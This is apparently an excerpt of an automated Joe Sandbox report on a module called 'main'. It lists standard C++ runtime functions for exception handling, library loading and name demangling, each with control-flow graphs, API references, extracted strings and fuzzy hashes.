                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 211107550-393685449
                                                                                                                                                            • Opcode ID: 9902ac396f5f1e5eb65265053c18698760bdb2f4646f61022d4b25bef39caf63
                                                                                                                                                            • Instruction ID: 07e0f0c92d730462831ae6419509e0045d779639700aceb6e0d6d5bb24d2ed1c
                                                                                                                                                            • Opcode Fuzzy Hash: 9902ac396f5f1e5eb65265053c18698760bdb2f4646f61022d4b25bef39caf63
                                                                                                                                                            • Instruction Fuzzy Hash: 51E17C72A08B828AEB20DF39D4842AD7BA0FB44F98F154175DF8D57696CF38E485DB00
                                                                                                                                                            Function 00007FF8BA24C0E8 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1907 7ff8ba24c0e8-7ff8ba24c10b 1908 7ff8ba24c284-7ff8ba24c292 1907->1908 1909 7ff8ba24c111-7ff8ba24c114 1907->1909 1910 7ff8ba24c296-7ff8ba24c29c call 7ff8ba247454 1908->1910 1911 7ff8ba24c11a-7ff8ba24c11d 1909->1911 1912 7ff8ba24c1a2-7ff8ba24c1a5 1909->1912 1920 7ff8ba24c2a1-7ff8ba24c2b3 1910->1920 1916 7ff8ba24c11f-7ff8ba24c130 1911->1916 1917 7ff8ba24c186-7ff8ba24c189 1911->1917 1914 7ff8ba24c1ed-7ff8ba24c1f0 1912->1914 1915 7ff8ba24c1a7-7ff8ba24c1ab 1912->1915 1918 7ff8ba24c209-7ff8ba24c219 call 7ff8ba248e24 1914->1918 1919 7ff8ba24c1f2-7ff8ba24c204 call 7ff8ba248ae4 1914->1919 1915->1918 1922 7ff8ba24c1ad-7ff8ba24c1b1 1915->1922 1923 7ff8ba24c15a-7ff8ba24c161 1916->1923 1924 7ff8ba24c132-7ff8ba24c139 1916->1924 1917->1912 1921 7ff8ba24c18b-7ff8ba24c18f 1917->1921 1940 7ff8ba24c25c-7ff8ba24c263 1918->1940 1941 7ff8ba24c21b-7ff8ba24c222 1918->1941 1919->1920 1921->1912 1928 7ff8ba24c191-7ff8ba24c195 1921->1928 1922->1918 1929 7ff8ba24c1b3-7ff8ba24c1c5 1922->1929 1926 7ff8ba24c168-7ff8ba24c181 call 7ff8ba2471a4 1923->1926 1930 7ff8ba24c140-7ff8ba24c155 call 7ff8ba2471a4 1924->1930 1926->1910 1928->1912 1934 7ff8ba24c197-7ff8ba24c19b 1928->1934 1935 7ff8ba24c1da-7ff8ba24c1e8 1929->1935 1936 7ff8ba24c1c7-7ff8ba24c1d5 1929->1936 1930->1920 1934->1912 1935->1926 1936->1930 1943 7ff8ba24c275-7ff8ba24c278 1940->1943 1944 7ff8ba24c265-7ff8ba24c273 1940->1944 1942 7ff8ba24c229-7ff8ba24c25a call 7ff8ba2471a4 call 7ff8ba247454 1941->1942 1946 7ff8ba24c27c-7ff8ba24c282 1942->1946 1943->1946 1944->1942 1946->1920
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                            • API String ID: 2943138195-2239912363
                                                                                                                                                            • Opcode ID: 1305b515cbaf95635a7cfc0865d0e29a814da15fe6187979d92cf9153ab28c6a
                                                                                                                                                            • Instruction ID: 88b040648e52d92552ee669a9676d38bc7adb5cdf149ddaf27e22bab5a1483fa
                                                                                                                                                            • Opcode Fuzzy Hash: 1305b515cbaf95635a7cfc0865d0e29a814da15fe6187979d92cf9153ab28c6a
                                                                                                                                                            • Instruction Fuzzy Hash: 09512662E18B9698FB11CBA8E8412BC37B0BF48B88F4441B6DF4D12B95DF7CA544E750
                                                                                                                                                            Function 00007FF8BA24614A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                                                                                            • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                                                                            • API String ID: 1852475696-928371585
                                                                                                                                                            • Opcode ID: 0c6297dfb5abee440ad437556e5c1f31f5a21848ecbcfced78d5801869866bd6
                                                                                                                                                            • Instruction ID: 1efa75ecc9677ec896e663afa17c3c8d904c8dcbbb9e10b6b12da145843a07ff
                                                                                                                                                            • Opcode Fuzzy Hash: 0c6297dfb5abee440ad437556e5c1f31f5a21848ecbcfced78d5801869866bd6
                                                                                                                                                            • Instruction Fuzzy Hash: BA51A162B18A8792EE20DB58E5916B96360FF44FC4F404172DF9E43B69DE3CE545D300
                                                                                                                                                            Function 00007FF8BA246AFC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 2000 7ff8ba246afc-7ff8ba246b3a 2001 7ff8ba246c2c 2000->2001 2002 7ff8ba246b40-7ff8ba246b43 2000->2002 2004 7ff8ba246c2e-7ff8ba246c4a 2001->2004 2003 7ff8ba246b49 2002->2003 2002->2004 2005 7ff8ba246b4c 2003->2005 2006 7ff8ba246b52-7ff8ba246b61 2005->2006 2007 7ff8ba246c24 2005->2007 2008 7ff8ba246b6e-7ff8ba246b8d LoadLibraryExW 2006->2008 2009 7ff8ba246b63-7ff8ba246b66 2006->2009 2007->2001 2012 7ff8ba246b8f-7ff8ba246b98 GetLastError 2008->2012 2013 7ff8ba246be6-7ff8ba246bfb 2008->2013 2010 7ff8ba246b6c 2009->2010 2011 7ff8ba246c06-7ff8ba246c15 GetProcAddress 2009->2011 2016 7ff8ba246bda-7ff8ba246be1 2010->2016 2011->2007 2015 7ff8ba246c17-7ff8ba246c22 2011->2015 2017 7ff8ba246b9a-7ff8ba246bb0 wcsncmp 2012->2017 2018 7ff8ba246bc8-7ff8ba246bd2 2012->2018 2013->2011 2014 7ff8ba246bfd-7ff8ba246c00 FreeLibrary 2013->2014 2014->2011 2015->2004 2016->2005 2017->2018 2019 7ff8ba246bb2-7ff8ba246bc6 LoadLibraryExW 2017->2019 2018->2016 2019->2013 2019->2018
                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BA246CBB,?,?,00000000,00007FF8BA246AEC,?,?,?,?,00007FF8BA246825), ref: 00007FF8BA246B81
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF8BA246CBB,?,?,00000000,00007FF8BA246AEC,?,?,?,?,00007FF8BA246825), ref: 00007FF8BA246B8F
                                                                                                                                                            • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8BA246CBB,?,?,00000000,00007FF8BA246AEC,?,?,?,?,00007FF8BA246825), ref: 00007FF8BA246BA8
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BA246CBB,?,?,00000000,00007FF8BA246AEC,?,?,?,?,00007FF8BA246825), ref: 00007FF8BA246BBA
                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF8BA246CBB,?,?,00000000,00007FF8BA246AEC,?,?,?,?,00007FF8BA246825), ref: 00007FF8BA246C00
                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF8BA246CBB,?,?,00000000,00007FF8BA246AEC,?,?,?,?,00007FF8BA246825), ref: 00007FF8BA246C0C
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                            • API String ID: 916704608-2084034818
                                                                                                                                                            • Opcode ID: 74c15477062b03c3fd625d17cda8a56baa85639a6f0d3bccb62915ee2d38ddba
                                                                                                                                                            • Instruction ID: 2e70e789ab20fbb3f61260111cca182bd23c3ca3ec558af560c3345d142b5795
                                                                                                                                                            • Opcode Fuzzy Hash: 74c15477062b03c3fd625d17cda8a56baa85639a6f0d3bccb62915ee2d38ddba
                                                                                                                                                            • Instruction Fuzzy Hash: 3731CB21B0EA4292EE15AB0AE9005B97794FF08FE0F1945B5EF2D1A790EF3CE145A300
                                                                                                                                                            Function 00007FF8BA2429DC Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 2088 7ff8ba2429dc-7ff8ba242a07 2089 7ff8ba242a09-7ff8ba242a16 call 7ff8ba24fc34 2088->2089 2090 7ff8ba242a18-7ff8ba242a1b 2088->2090 2092 7ff8ba242a1e-7ff8ba242a21 2089->2092 2090->2092 2094 7ff8ba242ba7 2092->2094 2095 7ff8ba242a27-7ff8ba242a2a 2092->2095 2096 7ff8ba242ba9-7ff8ba242bc2 2094->2096 2097 7ff8ba242a3d 2095->2097 2098 7ff8ba242a2c-7ff8ba242a3b call 7ff8ba24fc34 2095->2098 2100 7ff8ba242a40-7ff8ba242a44 2097->2100 2098->2100 2100->2094 2101 7ff8ba242a4a-7ff8ba242a4d 2100->2101 2103 7ff8ba242a58-7ff8ba242a5b 2101->2103 2104 7ff8ba242a4f-7ff8ba242a52 2101->2104 2105 7ff8ba242a5d-7ff8ba242a63 2103->2105 2106 7ff8ba242a66-7ff8ba242a6a 2103->2106 2104->2094 2104->2103 2105->2106 2107 7ff8ba242a9c-7ff8ba242aa0 2106->2107 2108 7ff8ba242a6c-7ff8ba242a70 2106->2108 2110 7ff8ba242abb-7ff8ba242abf 2107->2110 2111 7ff8ba242aa2-7ff8ba242aa9 2107->2111 2108->2107 2109 7ff8ba242a72-7ff8ba242a7c 2108->2109 2109->2107 2114 7ff8ba242a7e-7ff8ba242a87 2109->2114 2112 7ff8ba242b09-7ff8ba242b0d 2110->2112 2113 7ff8ba242ac1-7ff8ba242ac8 2110->2113 2115 7ff8ba242aab-7ff8ba242aae 2111->2115 2116 7ff8ba242ab5 abort 2111->2116 2120 7ff8ba242b0f-7ff8ba242b1c call 7ff8ba24fc48 2112->2120 2121 7ff8ba242b1e-7ff8ba242b21 2112->2121 2118 7ff8ba242aca-7ff8ba242acd 2113->2118 2119 7ff8ba242b03 abort 2113->2119 2131 7ff8ba242a89-7ff8ba242a8c 2114->2131 2132 7ff8ba242a96 abort 2114->2132 2115->2116 2117 7ff8ba242ab0-7ff8ba242ab3 2115->2117 2116->2110 2123 7ff8ba242af2-7ff8ba242afe call 7ff8ba2425e0 2117->2123 2118->2119 2125 7ff8ba242acf-7ff8ba242ae0 call 7ff8ba2412f0 2118->2125 2119->2112 2124 7ff8ba242b23-7ff8ba242b26 2120->2124 2121->2124 2143 7ff8ba242b95-7ff8ba242b97 2123->2143 2128 7ff8ba242b5a-7ff8ba242b5e 2124->2128 2129 7ff8ba242b28-7ff8ba242b2c 2124->2129 2142 7ff8ba242ae6-7ff8ba242ae9 2125->2142 2125->2143 2139 7ff8ba242b99-7ff8ba242ba6 abort * 2 2128->2139 2140 7ff8ba242b60-7ff8ba242b63 2128->2140 2134 7ff8ba242b2e-7ff8ba242b31 2129->2134 2135 7ff8ba242b54 abort 2129->2135 2131->2132 2137 7ff8ba242a8e-7ff8ba242a94 2131->2137 2132->2107 2134->2135 2141 7ff8ba242b33-7ff8ba242b52 call 7ff8ba2425e0 call 7ff8ba2412f0 2134->2141 2135->2128 2137->2123 2139->2094 2140->2139 2144 7ff8ba242b65-7ff8ba242b67 2140->2144 2141->2143 2142->2143 2146 7ff8ba242aef 2142->2146 2143->2096 2147 7ff8ba242b7a 2144->2147 2148 7ff8ba242b69-7ff8ba242b78 call 7ff8ba24fc48 2144->2148 2146->2123 2150 7ff8ba242b7d-7ff8ba242b80 2147->2150 2148->2150 2150->2139 2153 7ff8ba242b82-7ff8ba242b91 2150->2153 2153->2143
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: abort$AdjustPointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1501936508-0
                                                                                                                                                            • Opcode ID: 4262ea040b79b22edfa10952e5ae927a693a25cf4043396a56cb8bfdb1d73783
                                                                                                                                                            • Instruction ID: b251af26f86ee45d6a6d26dfea6e1986d56e79d7a466ab8f2afc31acabff193a
                                                                                                                                                            • Opcode Fuzzy Hash: 4262ea040b79b22edfa10952e5ae927a693a25cf4043396a56cb8bfdb1d73783
                                                                                                                                                            • Instruction Fuzzy Hash: 11518E22A0EB5381EA79DF1A95446386796AF44FC4F0A84B6CF4D4A785DF2CE842E300
                                                                                                                                                            Function 00007FF8BA2427F8 Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 2020 7ff8ba2427f8-7ff8ba242823 2021 7ff8ba242825-7ff8ba242832 call 7ff8ba24fc34 2020->2021 2022 7ff8ba242834-7ff8ba242837 2020->2022 2024 7ff8ba24283a-7ff8ba24283d 2021->2024 2022->2024 2026 7ff8ba242843-7ff8ba242846 2024->2026 2027 7ff8ba2429c0 2024->2027 2029 7ff8ba242859 2026->2029 2030 7ff8ba242848-7ff8ba242857 call 7ff8ba24fc34 2026->2030 2028 7ff8ba2429c2-7ff8ba2429db 2027->2028 2032 7ff8ba24285c-7ff8ba242860 2029->2032 2030->2032 2032->2027 2034 7ff8ba242866-7ff8ba242869 2032->2034 2035 7ff8ba24286b-7ff8ba24286d 2034->2035 2036 7ff8ba242873-7ff8ba242875 2034->2036 2035->2027 2035->2036 2037 7ff8ba242881-7ff8ba242884 2036->2037 2038 7ff8ba242877-7ff8ba24287e 2036->2038 2039 7ff8ba2428b6-7ff8ba2428b9 2037->2039 2040 7ff8ba242886-7ff8ba24288a 2037->2040 2038->2037 2042 7ff8ba2428bb-7ff8ba2428c2 2039->2042 2043 7ff8ba2428d4-7ff8ba2428d8 2039->2043 2040->2039 2041 7ff8ba24288c-7ff8ba242896 2040->2041 2041->2039 2044 7ff8ba242898-7ff8ba2428a1 2041->2044 2045 7ff8ba2428ce abort 2042->2045 2046 7ff8ba2428c4-7ff8ba2428c7 2042->2046 2047 7ff8ba2428da-7ff8ba2428e1 2043->2047 2048 7ff8ba242922-7ff8ba242926 2043->2048 2062 7ff8ba2428a3-7ff8ba2428a6 2044->2062 2063 7ff8ba2428b0 abort 2044->2063 2045->2043 2046->2045 2053 7ff8ba2428c9-7ff8ba2428cc 2046->2053 2049 7ff8ba24291c abort 2047->2049 2050 7ff8ba2428e3-7ff8ba2428e6 2047->2050 2051 7ff8ba242928-7ff8ba242935 call 7ff8ba24fc48 2048->2051 2052 7ff8ba242937-7ff8ba24293a 2048->2052 2049->2048 2050->2049 2054 7ff8ba2428e8-7ff8ba2428f9 call 7ff8ba2412f0 2050->2054 2058 7ff8ba24293c-7ff8ba24293f 2051->2058 2052->2058 2057 7ff8ba24290b-7ff8ba242917 call 7ff8ba2425e0 2053->2057 2074 7ff8ba2428ff-7ff8ba242902 2054->2074 2075 7ff8ba2429ae-7ff8ba2429b0 2054->2075 2057->2075 2059 7ff8ba242973-7ff8ba242977 2058->2059 2060 7ff8ba242941-7ff8ba242945 2058->2060 2071 7ff8ba242979-7ff8ba24297c 2059->2071 2072 7ff8ba2429b2-7ff8ba2429bf abort * 2 2059->2072 2066 7ff8ba24296d abort 2060->2066 2067 7ff8ba242947-7ff8ba24294a 2060->2067 2062->2063 2069 7ff8ba2428a8-7ff8ba2428ae 2062->2069 2063->2039 2066->2059 2067->2066 2073 7ff8ba24294c-7ff8ba24296b call 7ff8ba2425e0 call 7ff8ba2412f0 2067->2073 2069->2057 2071->2072 2076 7ff8ba24297e-7ff8ba242980 2071->2076 2072->2027 2073->2075 2074->2075 2078 7ff8ba242908 2074->2078 2075->2028 2079 7ff8ba242993 2076->2079 2080 7ff8ba242982-7ff8ba242991 call 7ff8ba24fc48 2076->2080 2078->2057 2083 7ff8ba242996-7ff8ba242999 2079->2083 2080->2083 2083->2072 2084 7ff8ba24299b-7ff8ba2429aa 2083->2084 2084->2075
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: abort$AdjustPointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1501936508-0
                                                                                                                                                            • Opcode ID: b88db04e0c6b6a7fd0ecd5e4de718b47766377f5fcd0859342ed9c2ffefca775
                                                                                                                                                            • Instruction ID: 2a24ca57de4a4ff907ad23c2b8fc3364a400906c724aaa18f252b7a062b9aa66
                                                                                                                                                            • Opcode Fuzzy Hash: b88db04e0c6b6a7fd0ecd5e4de718b47766377f5fcd0859342ed9c2ffefca775
                                                                                                                                                            • Instruction Fuzzy Hash: 44519E32E0AA4381FA69DB1A964463C6794BF44FC4F1A84B5DF4D06794DF2CE842E321
                                                                                                                                                            Function 00007FF8BA24E3F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID: {for
                                                                                                                                                            • API String ID: 2943138195-864106941
                                                                                                                                                            • Opcode ID: f54b40f3845f759ae055109a07e21250937708c10ed7f6c75c375f6a51192cfd
                                                                                                                                                            • Instruction ID: 212441e60f21f14374d3238dda0b97045a4664b9465a5716e1b6682cd0619dd0
                                                                                                                                                            • Opcode Fuzzy Hash: f54b40f3845f759ae055109a07e21250937708c10ed7f6c75c375f6a51192cfd
                                                                                                                                                            • Instruction Fuzzy Hash: 5D511772A18A86A9F7019F28D5813E837A1FB44B88F4480B1EF5C4BB95EF7CE654D350
                                                                                                                                                            Function 00007FF8BA24D9F4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: NameName::atol
                                                                                                                                                            • String ID: `template-parameter$void
                                                                                                                                                            • API String ID: 2130343216-4057429177
                                                                                                                                                            • Opcode ID: eb6e1e0d726b16e91ba7a5794e9a5fada6147386991bef4a5f72c05a3b662ee7
                                                                                                                                                            • Instruction ID: ce0683d092ea3ace3c3ef5d530e4da8f2ea19a6952127f7406c093b24200d651
                                                                                                                                                            • Opcode Fuzzy Hash: eb6e1e0d726b16e91ba7a5794e9a5fada6147386991bef4a5f72c05a3b662ee7
                                                                                                                                                            • Instruction Fuzzy Hash: 78415722F18B5698FB008BA8D8512FC23B1BF48BC8F9441B5DF4C26A59DF78A545E340
                                                                                                                                                            Function 00007FF8BA24A5AC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID: char $int $long $short $unsigned
                                                                                                                                                            • API String ID: 2943138195-3894466517
                                                                                                                                                            • Opcode ID: 61698b5b585472a95ae83896f89510239d489cb6366951c20d728b8c69cd34b2
                                                                                                                                                            • Instruction ID: 70454e45dd7c60d83bb892c9136b1355d47f4ccb34bcdf7c38deab24451f31c6
                                                                                                                                                            • Opcode Fuzzy Hash: 61698b5b585472a95ae83896f89510239d489cb6366951c20d728b8c69cd34b2
                                                                                                                                                            • Instruction Fuzzy Hash: BD412572E18A5689FB118F6DD8541BC2BB1BB08B88F4480B5DF4C17B98DE3DE544E740
                                                                                                                                                            Function 00007FF8BA248840 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+Replicator::operator[]
                                                                                                                                                            • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                            • API String ID: 1405650943-2211150622
                                                                                                                                                            • Opcode ID: aca1add002127f4cf3efdf703c71b4ab8f36cea5945326d46f333e640b62e85b
                                                                                                                                                            • Instruction ID: 40c244cc84e2bf5ed509557585fb0ac3a614d0255f04825c96e12f4f5728e4bf
                                                                                                                                                            • Opcode Fuzzy Hash: aca1add002127f4cf3efdf703c71b4ab8f36cea5945326d46f333e640b62e85b
                                                                                                                                                            • Instruction Fuzzy Hash: 13414AB2E28B8698F7018B6CD9402BC37B0BB08B88F5845B1CF4C22794EF7DA544E701
